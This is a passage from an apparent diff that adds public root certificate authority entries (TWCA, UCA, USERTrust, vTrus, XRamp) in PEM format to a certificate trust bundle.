+CvGwjVRDjAS6oz/v4jXH+XTgbzRB0L9zZVcg+ZtnemZoJE6AZb0QmQZZ8mWvuMZH +u/2QeItBcy6vVR/cO5JyboTT0GFMDcx2V+IthSIVNg3rAZ3r2OvEhJn7wAzMMujj +d9qDRIueVSjAi1jTkD5OGwDxFa2DK5o= +-----END CERTIFICATE----- + +# TWCA CYBER Root CA +-----BEGIN CERTIFICATE----- +MIIFjTCCA3WgAwIBAgIQQAE0jMIAAAAAAAAAATzyxjANBgkqhkiG9w0BAQwFADBQ +MQswCQYDVQQGEwJUVzESMBAGA1UEChMJVEFJV0FOLUNBMRAwDgYDVQQLEwdSb290 +IENBMRswGQYDVQQDExJUV0NBIENZQkVSIFJvb3QgQ0EwHhcNMjIxMTIyMDY1NDI5 +WhcNNDcxMTIyMTU1OTU5WjBQMQswCQYDVQQGEwJUVzESMBAGA1UEChMJVEFJV0FO +LUNBMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJUV0NBIENZQkVSIFJvb3Qg +Q0EwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDG+Moe2Qkgfh1sTs6P +40czRJzHyWmqOlt47nDSkvgEs1JSHWdyKKHfi12VCv7qze33Kc7wb3+szT3vsxxF +avcokPFhV8UMxKNQXd7UtcsZyoC5dc4pztKFIuwCY8xEMCDa6pFbVuYdHNWdZsc/ +34bKS1PE2Y2yHer43CdTo0fhYcx9tbD47nORxc5zb87uEB8aBs/pJ2DFTxnk684i +JkXXYJndzk834H/nY62wuFm40AZoNWDTNq5xQwTxaWV4fPMf88oon1oglWa0zbfu +j3ikRRjpJi+NmykosaS3Om251Bw4ckVYsV7r8Cibt4LK/c/WMw+f+5eesRycnupf +Xtuq3VTpMCEobY5583WSjCb+3MX2w7DfRFlDo7YDKPYIMKoNM+HvnKkHIuNZW0CP +2oi3aQiotyMuRAlZN1vH4xfyIutuOVLF3lSnmMlLIJXcRolftBL5hSmO68gnFSDA +S9TMfAxsNAwmmyYxpjyn9tnQS6Jk/zuZQXLB4HCX8SS7K8R0IrGsayIyJNN4KsDA +oS/xUgXJP+92ZuJF2A09rZXIx4kmyA+upwMu+8Ff+iDhcK2wZSA3M2Cw1a/XDBzC +kHDXShi8fgGwsOsVHkQGzaRP6AzRwyAQ4VRlnrZR0Bp2a0JaWHY06rc3Ga4udfmW +5cFZ95RXKSWNOkyrTZpB0F8mAwIDAQABo2MwYTAOBgNVHQ8BAf8EBAMCAQYwDwYD +VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBSdhWEUfMFib5do5E83QOGt4A1WNzAd +BgNVHQ4EFgQUnYVhFHzBYm+XaORPN0DhreANVjcwDQYJKoZIhvcNAQEMBQADggIB +AGSPesRiDrWIzLjHhg6hShbNcAu3p4ULs3a2D6f/CIsLJc+o1IN1KriWiLb73y0t +tGlTITVX1olNc79pj3CjYcya2x6a4CD4bLubIp1dhDGaLIrdaqHXKGnK/nZVekZn +68xDiBaiA9a5F/gZbG0jAn/xX9AKKSM70aoK7akXJlQKTcKlTfjF/biBzysseKNn +TKkHmvPfXvt89YnNdJdhEGoHK4Fa0o635yDRIG4kqIQnoVesqlVYL9zZyvpoBJ7t +RCT5dEA7IzOrg1oYJkK2bVS1FmAwbLGg+LhBoF1JSdJlBTrq/p1hvIbZv97Tujqx +f36SNI7JAG7cmL3c7IAFrQI932XtCwP39xaEBDG6k5TY8hL4iuO/Qq+n1M0RFxbI +Qh0UqEL20kCGoE8jypZFVmAGzbdVAaYBlGX+bgUJurSkquLvWL69J1bY73NxW0Qz +8ppy6rBePm6pUlvscG21h483XjyMnM7k8M4MZ0HMzvaAq07MTFb1wWFZk7Q+ptq4 +NxKfKjLji7gh7MMrZQzvIt6IKTtM1/r+t+FHvpw+PoP7UV31aPcuIYXcv/Fa4nzX +xeSDwWrruoBa3lwtcHb4yOWHh8qgnaHlIhInD0Q9HWzq1MKLL295q39QpsQZp6F6 +t5b5wR9iWqJDB0BeJsas7a5wFsWqynKKTbDPAYsDP27X +-----END CERTIFICATE----- + +# TWCA Global Root CA +-----BEGIN CERTIFICATE----- +MIIFQTCCAymgAwIBAgICDL4wDQYJKoZIhvcNAQELBQAwUTELMAkGA1UEBhMCVFcx +EjAQBgNVBAoTCVRBSVdBTi1DQTEQMA4GA1UECxMHUm9vdCBDQTEcMBoGA1UEAxMT +VFdDQSBHbG9iYWwgUm9vdCBDQTAeFw0xMjA2MjcwNjI4MzNaFw0zMDEyMzExNTU5 +NTlaMFExCzAJBgNVBAYTAlRXMRIwEAYDVQQKEwlUQUlXQU4tQ0ExEDAOBgNVBAsT +B1Jvb3QgQ0ExHDAaBgNVBAMTE1RXQ0EgR2xvYmFsIFJvb3QgQ0EwggIiMA0GCSqG +SIb3DQEBAQUAA4ICDwAwggIKAoICAQCwBdvI64zEbooh745NnHEKH1Jw7W2CnJfF +10xORUnLQEK1EjRsGcJ0pDFfhQKX7EMzClPSnIyOt7h52yvVavKOZsTuKwEHktSz +0ALfUPZVr2YOy+BHYC8rMjk1Ujoog/h7FsYYuGLWRyWRzvAZEk2tY/XTP3VfKfCh +MBwqoJimFb3u/Rk28OKRQ4/6ytYQJ0lM793B8YVwm8rqqFpD/G2Gb3PpN0Wp8DbH +zIh1HrtsBv+baz4X7GGqcXzGHaL3SekVtTzWoWH1EfcFbx39Eb7QMAfCKbAJTibc +46KokWofwpFFiFzlmLhxpRUZyXx1EcxwdE8tmx2RRP1WKKD+u4ZqyPpcC1jcxkt2 +yKsi2XMPpfRaAok/T54igu6idFMqPVMnaR1sjjIsZAAmY2E2TqNGtz99sy2sbZCi +laLOz9qC5wc0GZbpuCGqKX6mOL6OKUohZnkfs8O1CWfe1tQHRvMq2uYiN2DLgbYP +oA/pyJV/v1WRBXrPPRXAb94JlAGD1zQbzECl8LibZ9WYkTunhHiVJqRaCPgrdLQA +BDzfuBSO6N+pjWxnkjMdwLfS7JLIvgm/LCkFbwJrnu+8vyq8W8BQj0FwcYeyTbcE +qYSjMq+u7msXi7Kx/mzhkIyIqJdIzshNy/MGz19qCkKxHh53L46g5pIOBvwFItIm +4TFRfTLcDwIDAQABoyMwITAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB +/zANBgkqhkiG9w0BAQsFAAOCAgEAXzSBdu+WHdXltdkCY4QWwa6gcFGn90xHNcgL +1yg9iXHZqjNB6hQbbCEAwGxCGX6faVsgQt+i0trEfJdLjbDorMjupWkEmQqSpqsn +LhpNgb+E1HAerUf+/UqdM+DyucRFCCEK2mlpc3INvjT+lIutwx4116KD7+U4x6WF +H6vPNOw/KP4M8VeGTslV9xzU2KV9Bnpv1d8Q34FOIWWxtuEXeZVFBs5fzNxGiWNo +RI2T9GRwoD2dKAXDOXC4Ynsg/eTb6QihuJ49CcdP+yz4k3ZB3lLg4VfSnQO8d57+ +nile98FRYB/e2guyLXW3Q0iT5/Z5xoRdgFlglPx4mI88k1HtQJAH32RjJMtOcQWh +15QaiDLxInQirqWm2BJpTGCjAu4r7NRjkgtevi92a6O2JryPA9gK8kxkRr05YuWW +6zRjESjMlfGt7+/cgFhI6Uu46mWs6fyAtbXIRfmswZ/ZuepiiI7E8UuDEq3mi4TW +nsLrgxifarsbJGAzcMzs9zLzXNl5fe+epP7JI8Mk7hWSsT2RTyaGvWZzJBPqpK5j +wa19hAM8EHiGG3njxPPyBJUgriOCxLM6AGK/5jYk4Ve6xx6QddVfP5VhK8E7zeWz +aGHQRiapIVJpLesux+t3zqY6tQMzT3bR51xUAV3LePTJDL/PEo4XLSNolOer/qmy +KwbQBM0= +-----END CERTIFICATE----- + +# TWCA Root Certification Authority +-----BEGIN CERTIFICATE----- +MIIDezCCAmOgAwIBAgIBATANBgkqhkiG9w0BAQUFADBfMQswCQYDVQQGEwJUVzES +MBAGA1UECgwJVEFJV0FOLUNBMRAwDgYDVQQLDAdSb290IENBMSowKAYDVQQDDCFU +V0NBIFJvb3QgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMDgwODI4MDcyNDMz +WhcNMzAxMjMxMTU1OTU5WjBfMQswCQYDVQQGEwJUVzESMBAGA1UECgwJVEFJV0FO +LUNBMRAwDgYDVQQLDAdSb290IENBMSowKAYDVQQDDCFUV0NBIFJvb3QgQ2VydGlm +aWNhdGlvbiBBdXRob3JpdHkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB +AQCwfnK4pAOU5qfeCTiRShFAh6d8WWQUe7UREN3+v9XAu1bihSX0NXIP+FPQQeFE +AcK0HMMxQhZHhTMidrIKbw/lJVBPhYa+v5guEGcevhEFhgWQxFnQfHgQsIBct+HH +K3XLfJ+utdGdIzdjp9xCoi2SBBtQwXu4PhvJVgSLL1KbralW6cH/ralYhzC2gfeX +RfwZVzsrb+RH9JlF/h3x+JejiB03HFyP4HYlmlD4oFT/RJB2I9IyxsOrBr/8+7/z +rX2SYgJbKdM1o5OaQ2RgXbL6Mv87BK9NQGr5x+PvI/1ry+UPizgN7gr8/g+YnzAx +3WxSZfmLgb4i4RxYA7qRG4kHAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNV +HRMBAf8EBTADAQH/MB0GA1UdDgQWBBRqOFsmjd6LWvJPelSDGRjjCDWmujANBgkq +hkiG9w0BAQUFAAOCAQEAPNV3PdrfibqHDAhUaiBQkr6wQT25JmSDCi/oQMCXKCeC +MErJk/9q56YAf4lCmtYR5VPOL8zy2gXE/uJQxDqGfczafhAJO5I1KlOy/usrBdls +XebQ79NqZp4VKIV66IIArB6nCWlWQtNoURi+VJq/REG6Sb4gumlc7rh3zc5sH62D +lhh9DrUUOYTxKOkto557HnpyWoOzeW/vtPzQCqVYT0bf+215WfKEIlKuD8z7fDvn +aspHYcN6+NOSBB+4IIThNlQWx0DeO4pz3N/GCUzf7Nr/1FNCocnyYh0igzyXxfkZ +YiesZSLX0zzG5Y6yU8xJzrww/nsOM5D77dIUkR8Hrw== +-----END CERTIFICATE----- + +# UCA Extended Validation Root +-----BEGIN CERTIFICATE----- +MIIFWjCCA0KgAwIBAgIQT9Irj/VkyDOeTzRYZiNwYDANBgkqhkiG9w0BAQsFADBH +MQswCQYDVQQGEwJDTjERMA8GA1UECgwIVW5pVHJ1c3QxJTAjBgNVBAMMHFVDQSBF +eHRlbmRlZCBWYWxpZGF0aW9uIFJvb3QwHhcNMTUwMzEzMDAwMDAwWhcNMzgxMjMx +MDAwMDAwWjBHMQswCQYDVQQGEwJDTjERMA8GA1UECgwIVW5pVHJ1c3QxJTAjBgNV +BAMMHFVDQSBFeHRlbmRlZCBWYWxpZGF0aW9uIFJvb3QwggIiMA0GCSqGSIb3DQEB +AQUAA4ICDwAwggIKAoICAQCpCQcoEwKwmeBkqh5DFnpzsZGgdT6o+uM4AHrsiWog +D4vFsJszA1qGxliG1cGFu0/GnEBNyr7uaZa4rYEwmnySBesFK5pI0Lh2PpbIILvS +sPGP2KxFRv+qZ2C0d35qHzwaUnoEPQc8hQ2E0B92CvdqFN9y4zR8V05WAT558aop +O2z6+I9tTcg1367r3CTueUWnhbYFiN6IXSV8l2RnCdm/WhUFhvMJHuxYMjMR83dk +sHYf5BA1FxvyDrFspCqjc/wJHx4yGVMR59mzLC52LqGj3n5qiAno8geK+LLNEOfi +c0CTuwjRP+H8C5SzJe98ptfRr5//lpr1kXuYC3fUfugH0mK1lTnj8/FtDw5lhIpj +VMWAtuCeS31HJqcBCF3RiJ7XwzJE+oJKCmhUfzhTA8ykADNkUVkLo4KRel7sFsLz +KuZi2irbWWIQJUoqgQtHB0MGcIfS+pMRKXpITeuUx3BNr2fVUbGAIAEBtHoIppB/ +TuDvB0GHr2qlXov7z1CymlSvw4m6WC31MJixNnI5fkkE/SmnTHnkBVfblLkWU41G +sx2VYVdWf6/wFlthWG82UBEL2KwrlRYaDh8IzTY0ZRBiZtWAXxQgXy0MoHgKaNYs +1+lvK9JKBZP8nm9rZ/+I8U6laUpSNwXqxhaN0sSZ0YIrO7o1dfdRUVjzyAfd5LQD +fwIDAQABo0IwQDAdBgNVHQ4EFgQU2XQ65DA9DfcS3H5aBZ8eNJr34RQwDwYDVR0T +AQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAYYwDQYJKoZIhvcNAQELBQADggIBADaN +l8xCFWQpN5smLNb7rhVpLGsaGvdftvkHTFnq88nIua7Mui563MD1sC3AO6+fcAUR +ap8lTwEpcOPlDOHqWnzcSbvBHiqB9RZLcpHIojG5qtr8nR/zXUACE/xOHAbKsxSQ +VBcZEhrxH9cMaVr2cXj0lH2RC47skFSOvG+hTKv8dGT9cZr4QQehzZHkPJrgmzI5 +c6sq1WnIeJEmMX3ixzDx/BR4dxIOE/TdFpS/S2d7cFOFyrC78zhNLJA5wA3CXWvp +4uXViI3WLL+rG761KIcSF3Ru/H38j9CHJrAb+7lsq+KePRXBOy5nAliRn+/4Qh8s +t2j1da3Ptfb/EX3C8CSlrdP6oDyp+l3cpaDvRKS+1ujl5BOWF3sGPjLtx7dCvHaj +2GU4Kzg1USEODm8uNBNA4StnDG1KQTAYI1oyVZnJF+A83vbsea0rWBmirSwiGpWO +vpaQXUJXxPkUAzUrHC1RVwinOt4/5Mi0A3PCwSaAuwtCH60NryZy2sy+s6ODWA2C +xR9GUeOcGMyNm43sSet1UNWMKFnKdDTajAshqx7qG+XH/RU+wBeq+yNuJkbL+vmx +cmtpzyKEC2IPrNkZAJSidjzULZrtBJ4tBmIQN1IchXIbJ+XMxjHsN+xjWZsLHXbM +fjKaiJUINlK73nZfdklJrX+9ZSCyycErdhh2n1ax +-----END CERTIFICATE----- + +# UCA Global G2 Root +-----BEGIN CERTIFICATE----- +MIIFRjCCAy6gAwIBAgIQXd+x2lqj7V2+WmUgZQOQ7zANBgkqhkiG9w0BAQsFADA9 +MQswCQYDVQQGEwJDTjERMA8GA1UECgwIVW5pVHJ1c3QxGzAZBgNVBAMMElVDQSBH +bG9iYWwgRzIgUm9vdDAeFw0xNjAzMTEwMDAwMDBaFw00MDEyMzEwMDAwMDBaMD0x +CzAJBgNVBAYTAkNOMREwDwYDVQQKDAhVbmlUcnVzdDEbMBkGA1UEAwwSVUNBIEds +b2JhbCBHMiBSb290MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAxeYr +b3zvJgUno4Ek2m/LAfmZmqkywiKHYUGRO8vDaBsGxUypK8FnFyIdK+35KYmToni9 +kmugow2ifsqTs6bRjDXVdfkX9s9FxeV67HeToI8jrg4aA3++1NDtLnurRiNb/yzm +VHqUwCoV8MmNsHo7JOHXaOIxPAYzRrZUEaalLyJUKlgNAQLx+hVRZ2zA+te2G3/R +VogvGjqNO7uCEeBHANBSh6v7hn4PJGtAnTRnvI3HLYZveT6OqTwXS3+wmeOwcWDc +C/Vkw85DvG1xudLeJ1uK6NjGruFZfc8oLTW4lVYa8bJYS7cSN8h8s+1LgOGN+jIj +tm+3SJUIsUROhYw6AlQgL9+/V087OpAh18EmNVQg7Mc/R+zvWr9LesGtOxdQXGLY +D0tK3Cv6brxzks3sx1DoQZbXqX5t2Okdj4q1uViSukqSKwxW/YDrCPBeKW4bHAyv +j5OJrdu9o54hyokZ7N+1wxrrFv54NkzWbtA+FxyQF2smuvt6L78RHBgOLXMDj6Dl +NaBa4kx1HXHhOThTeEDMg5PXCp6dW4+K5OXgSORIskfNTip1KnvyIvbJvgmRlld6 +iIis7nCs+dwp4wwcOxJORNanTrAmyPPZGpeRaOrvjUYG0lZFWJo8DA+DuAUlwznP +O6Q0ibd5Ei9Hxeepl2n8pndntd978XplFeRhVmUCAwEAAaNCMEAwDgYDVR0PAQH/ +BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFIHEjMz15DD/pQwIX4wV +ZyF0Ad/fMA0GCSqGSIb3DQEBCwUAA4ICAQATZSL1jiutROTL/7lo5sOASD0Ee/oj +L3rtNtqyzm325p7lX1iPyzcyochltq44PTUbPrw7tgTQvPlJ9Zv3hcU2tsu8+Mg5 +1eRfB70VVJd0ysrtT7q6ZHafgbiERUlMjW+i67HM0cOU2kTC5uLqGOiiHycFutfl +1qnN3e92mI0ADs0b+gO3joBYDic/UvuUospeZcnWhNq5NXHzJsBPd+aBJ9J3O5oU +b3n09tDh05S60FdRvScFDcH9yBIw7m+NESsIndTUv4BFFJqIRNow6rSn4+7vW4LV +PtateJLbXDzz2K36uGt/xDYotgIVilQsnLAXc47QN6MUPJiVAAwpBVueSUmxX8fj +y88nZY41F7dXyDDZQVu5FLbowg+UMaeUmMxq67XhJ/UQqAHojhJi6IjMtX9Gl8Cb +EGY4GjZGXyJoPd/JxhMnq1MGrKI8hgZlb7F+sSlEmqO6SWkoaY/X5V+tBIZkbxqg +DMUIYs6Ao9Dz7GjevjPHF1t/gMRMTLGmhIrDO7gJzRSBuhjjVFc2/tsvfEehOjPI ++Vg7RE+xygKJBJYoaMVLuCaJu9YzL1DV/pqJuhgyklTGW+Cd+V7lDSKb9triyCGy +YiGqhkCyLmTTX8jjfhFnRR8F/uOi77Oos/N9j/gMHyIfLXC0uAE0djAA5SN4p1bX +UB+K+wb1whnw0A== +-----END CERTIFICATE----- + +# USERTrust ECC Certification Authority +-----BEGIN CERTIFICATE----- +MIICjzCCAhWgAwIBAgIQXIuZxVqUxdJxVt7NiYDMJjAKBggqhkjOPQQDAzCBiDEL +MAkGA1UEBhMCVVMxEzARBgNVBAgTCk5ldyBKZXJzZXkxFDASBgNVBAcTC0plcnNl +eSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsxLjAsBgNVBAMT +JVVTRVJUcnVzdCBFQ0MgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMTAwMjAx +MDAwMDAwWhcNMzgwMTE4MjM1OTU5WjCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT +Ck5ldyBKZXJzZXkxFDASBgNVBAcTC0plcnNleSBDaXR5MR4wHAYDVQQKExVUaGUg +VVNFUlRSVVNUIE5ldHdvcmsxLjAsBgNVBAMTJVVTRVJUcnVzdCBFQ0MgQ2VydGlm +aWNhdGlvbiBBdXRob3JpdHkwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAAQarFRaqflo +I+d61SRvU8Za2EurxtW20eZzca7dnNYMYf3boIkDuAUU7FfO7l0/4iGzzvfUinng +o4N+LZfQYcTxmdwlkWOrfzCjtHDix6EznPO/LlxTsV+zfTJ/ijTjeXmjQjBAMB0G +A1UdDgQWBBQ64QmG1M8ZwpZ2dEl23OA1xmNjmjAOBgNVHQ8BAf8EBAMCAQYwDwYD +VR0TAQH/BAUwAwEB/zAKBggqhkjOPQQDAwNoADBlAjA2Z6EWCNzklwBBHU6+4WMB +zzuqQhFkoJ2UOQIReVx7Hfpkue4WQrO/isIJxOzksU0CMQDpKmFHjFJKS04YcPbW +RNZu9YO6bVi9JNlWSOrvxKJGgYhqOkbRqZtNyWHa0V1Xahg= +-----END CERTIFICATE----- + +# USERTrust RSA Certification Authority +-----BEGIN CERTIFICATE----- +MIIF3jCCA8agAwIBAgIQAf1tMPyjylGoG7xkDjUDLTANBgkqhkiG9w0BAQwFADCB +iDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCk5ldyBKZXJzZXkxFDASBgNVBAcTC0pl +cnNleSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsxLjAsBgNV +BAMTJVVTRVJUcnVzdCBSU0EgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMTAw +MjAxMDAwMDAwWhcNMzgwMTE4MjM1OTU5WjCBiDELMAkGA1UEBhMCVVMxEzARBgNV +BAgTCk5ldyBKZXJzZXkxFDASBgNVBAcTC0plcnNleSBDaXR5MR4wHAYDVQQKExVU +aGUgVVNFUlRSVVNUIE5ldHdvcmsxLjAsBgNVBAMTJVVTRVJUcnVzdCBSU0EgQ2Vy +dGlmaWNhdGlvbiBBdXRob3JpdHkwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIK +AoICAQCAEmUXNg7D2wiz0KxXDXbtzSfTTK1Qg2HiqiBNCS1kCdzOiZ/MPans9s/B +3PHTsdZ7NygRK0faOca8Ohm0X6a9fZ2jY0K2dvKpOyuR+OJv0OwWIJAJPuLodMkY +tJHUYmTbf6MG8YgYapAiPLz+E/CHFHv25B+O1ORRxhFnRghRy4YUVD+8M/5+bJz/ +Fp0YvVGONaanZshyZ9shZrHUm3gDwFA66Mzw3LyeTP6vBZY1H1dat//O+T23LLb2 +VN3I5xI6Ta5MirdcmrS3ID3KfyI0rn47aGYBROcBTkZTmzNg95S+UzeQc0PzMsNT +79uq/nROacdrjGCT3sTHDN/hMq7MkztReJVni+49Vv4M0GkPGw/zJSZrM233bkf6 +c0Plfg6lZrEpfDKEY1WJxA3Bk1QwGROs0303p+tdOmw1XNtB1xLaqUkL39iAigmT +Yo61Zs8liM2EuLE/pDkP2QKe6xJMlXzzawWpXhaDzLhn4ugTncxbgtNMs+1b/97l +c6wjOy0AvzVVdAlJ2ElYGn+SNuZRkg7zJn0cTRe8yexDJtC/QV9AqURE9JnnV4ee +UB9XVKg+/XRjL7FQZQnmWEIuQxpMtPAlR1n6BB6T1CZGSlCBst6+eLf8ZxXhyVeE +Hg9j1uliutZfVS7qXMYoCAQlObgOK6nyTJccBz8NUvXt7y+CDwIDAQABo0IwQDAd +BgNVHQ4EFgQUU3m/WqorSs9UgOHYm8Cd8rIDZsswDgYDVR0PAQH/BAQDAgEGMA8G +A1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEMBQADggIBAFzUfA3P9wF9QZllDHPF +Up/L+M+ZBn8b2kMVn54CVVeWFPFSPCeHlCjtHzoBN6J2/FNQwISbxmtOuowhT6KO +VWKR82kV2LyI48SqC/3vqOlLVSoGIG1VeCkZ7l8wXEskEVX/JJpuXior7gtNn3/3 +ATiUFJVDBwn7YKnuHKsSjKCaXqeYalltiz8I+8jRRa8YFWSQEg9zKC7F4iRO/Fjs +8PRF/iKz6y+O0tlFYQXBl2+odnKPi4w2r78NBc5xjeambx9spnFixdjQg3IM8WcR +iQycE0xyNN+81XHfqnHd4blsjDwSXWXavVcStkNr/+XeTWYRUc+ZruwXtuhxkYze +Sf7dNXGiFSeUHM9h4ya7b6NnJSFd5t0dCy5oGzuCr+yDZ4XUmFF0sbmZgIn/f3gZ +XHlKYC6SQK5MNyosycdiyA5d9zZbyuAlJQG03RoHnHcAP9Dc1ew91Pq7P8yF1m9/ +qS3fuQL39ZeatTXaw2ewh0qpKJ4jjv9cJ2vhsE/zB+4ALtRZh8tSQZXq9EfX7mRB +VXyNWQKV3WKdwrnuWih0hKWbt5DHDAff9Yk2dDLWKMGwsAvgnEzDHNb842m1R0aB +L6KCq9NjRHDEjf8tM7qtj3u1cIiuPhnPQCjY/MiQu12ZIvVS5ljFH4gxQ+6IHdfG +jjxDah2nGN59PRbxYvnKkKj9 +-----END CERTIFICATE----- + +# vTrus ECC Root CA +-----BEGIN CERTIFICATE----- +MIICDzCCAZWgAwIBAgIUbmq8WapTvpg5Z6LSa6Q75m0c1towCgYIKoZIzj0EAwMw +RzELMAkGA1UEBhMCQ04xHDAaBgNVBAoTE2lUcnVzQ2hpbmEgQ28uLEx0ZC4xGjAY +BgNVBAMTEXZUcnVzIEVDQyBSb290IENBMB4XDTE4MDczMTA3MjY0NFoXDTQzMDcz +MTA3MjY0NFowRzELMAkGA1UEBhMCQ04xHDAaBgNVBAoTE2lUcnVzQ2hpbmEgQ28u +LEx0ZC4xGjAYBgNVBAMTEXZUcnVzIEVDQyBSb290IENBMHYwEAYHKoZIzj0CAQYF +K4EEACIDYgAEZVBKrox5lkqqHAjDo6LN/llWQXf9JpRCux3NCNtzslt188+cToL0 +v/hhJoVs1oVbcnDS/dtitN9Ti72xRFhiQgnH+n9bEOf+QP3A2MMrMudwpremIFUd +e4BdS49nTPEQo0IwQDAdBgNVHQ4EFgQUmDnNvtiyjPeyq+GtJK97fKHbH88wDwYD +VR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwCgYIKoZIzj0EAwMDaAAwZQIw +V53dVvHH4+m4SVBrm2nDb+zDfSXkV5UTQJtS0zvzQBm8JsctBp61ezaf9SXUY2sA +AjEA6dPGnlaaKsyh2j/IZivTWJwghfqrkYpwcBE4YGQLYgmRWAD5Tfs0aNoJrSEG +GJTO +-----END CERTIFICATE----- + +# vTrus Root CA +-----BEGIN CERTIFICATE----- +MIIFVjCCAz6gAwIBAgIUQ+NxE9izWRRdt86M/TX9b7wFjUUwDQYJKoZIhvcNAQEL +BQAwQzELMAkGA1UEBhMCQ04xHDAaBgNVBAoTE2lUcnVzQ2hpbmEgQ28uLEx0ZC4x +FjAUBgNVBAMTDXZUcnVzIFJvb3QgQ0EwHhcNMTgwNzMxMDcyNDA1WhcNNDMwNzMx +MDcyNDA1WjBDMQswCQYDVQQGEwJDTjEcMBoGA1UEChMTaVRydXNDaGluYSBDby4s +THRkLjEWMBQGA1UEAxMNdlRydXMgUm9vdCBDQTCCAiIwDQYJKoZIhvcNAQEBBQAD +ggIPADCCAgoCggIBAL1VfGHTuB0EYgWgrmy3cLRB6ksDXhA/kFocizuwZotsSKYc +IrrVQJLuM7IjWcmOvFjai57QGfIvWcaMY1q6n6MLsLOaXLoRuBLpDLvPbmyAhykU +AyyNJJrIZIO1aqwTLDPxn9wsYTwaP3BVm60AUn/PBLn+NvqcwBauYv6WTEN+VRS+ +GrPSbcKvdmaVayqwlHeFXgQPYh1jdfdr58tbmnDsPmcF8P4HCIDPKNsFxhQnL4Z9 +8Cfe/+Z+M0jnCx5Y0ScrUw5XSmXX+6KAYPxMvDVTAWqXcoKv8R1w6Jz1717CbMdH +flqUhSZNO7rrTOiwCcJlwp2dCZtOtZcFrPUGoPc2BX70kLJrxLT5ZOrpGgrIDajt +J8nU57O5q4IikCc9Kuh8kO+8T/3iCiSn3mUkpF3qwHYw03dQ+A0Em5Q2AXPKBlim +0zvc+gRGE1WKyURHuFE5Gi7oNOJ5y1lKCn+8pu8fA2dqWSslYpPZUxlmPCdiKYZN +pGvu/9ROutW04o5IWgAZCfEF2c6Rsffr6TlP9m8EQ5pV9T4FFL2/s1m02I4zhKOQ +UqqzApVg+QxMaPnu1RcN+HFXtSXkKe5lXa/R7jwXC1pDxaWG6iSe4gUH3DRCEpHW +OXSuTEGC2/KmSNGzm/MzqvOmwMVO9fSddmPmAsYiS8GVP1BkLFTltvA8Kc9XAgMB +AAGjQjBAMB0GA1UdDgQWBBRUYnBj8XWEQ1iO0RYgscasGrz2iTAPBgNVHRMBAf8E +BTADAQH/MA4GA1UdDwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEAKbqSSaet +8PFww+SX8J+pJdVrnjT+5hpk9jprUrIQeBqfTNqK2uwcN1LgQkv7bHbKJAs5EhWd +nxEt/Hlk3ODg9d3gV8mlsnZwUKT+twpw1aA08XXXTUm6EdGz2OyC/+sOxL9kLX1j +bhd47F18iMjrjld22VkE+rxSH0Ws8HqA7Oxvdq6R2xCOBNyS36D25q5J08FsEhvM +Kar5CKXiNxTKsbhm7xqC5PD48acWabfbqWE8n/Uxy+QARsIvdLGx14HuqCaVvIiv +TDUHKgLKeBRtRytAVunLKmChZwOgzoy8sHJnxDHO2zTlJQNgJXtxmOTAGytfdELS +S8VZCAeHvsXDf+eW2eHcKJfWjwXj9ZtOyh1QRwVTsMo554WgicEFOwE30z9J4nfr +I8iIZjs9OXYhRvHsXyO466JmdXTBQPfYaJqT4i2pLr0cox7IdMakLXogqzu4sEb9 +b91fUlV1YvCXoHzXOP0l382gmxDPi7g4Xl7FtKYCNqEeXxzP4padKar9mK5S4fNB +UvupLnKWnyfjqnN9+BojZns7q2WwMgFLFT49ok8MKzWixtlnEjUwzXYuFrOZnk1P +Ti07NEPhmg4NpGaXutIcSkwsKouLgU9xGqndXHt7CMUADTdA43x7VF8vhV929ven +sBxXVsFy6K2ir40zSbofitzmdHxghm+Hl3s= +-----END CERTIFICATE----- + +# XRamp Global CA Root +-----BEGIN CERTIFICATE----- +MIIEMDCCAxigAwIBAgIQUJRs7Bjq1ZxN1ZfvdY+grTANBgkqhkiG9w0BAQUFADCB +gjELMAkGA1UEBhMCVVMxHjAcBgNVBAsTFXd3dy54cmFtcHNlY3VyaXR5LmNvbTEk +MCIGA1UEChMbWFJhbXAgU2VjdXJpdHkgU2VydmljZXMgSW5jMS0wKwYDVQQDEyRY +UmFtcCBHbG9iYWwgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMDQxMTAxMTcx +NDA0WhcNMzUwMTAxMDUzNzE5WjCBgjELMAkGA1UEBhMCVVMxHjAcBgNVBAsTFXd3 +dy54cmFtcHNlY3VyaXR5LmNvbTEkMCIGA1UEChMbWFJhbXAgU2VjdXJpdHkgU2Vy +dmljZXMgSW5jMS0wKwYDVQQDEyRYUmFtcCBHbG9iYWwgQ2VydGlmaWNhdGlvbiBB +dXRob3JpdHkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCYJB69FbS6 +38eMpSe2OAtp87ZOqCwuIR1cRN8hXX4jdP5efrRKt6atH67gBhbim1vZZ3RrXYCP +KZ2GG9mcDZhtdhAoWORlsH9KmHmf4MMxfoArtYzAQDsRhtDLooY2YKTVMIJt2W7Q +DxIEM5dfT2Fa8OT5kavnHTu86M/0ay00fOJIYRyO82FEzG+gSqmUsE3a56k0enI4 +qEHMPJQRfevIpoy3hsvKMzvZPTeL+3o+hiznc9cKV6xkmxnr9A8ECIqsAxcZZPRa 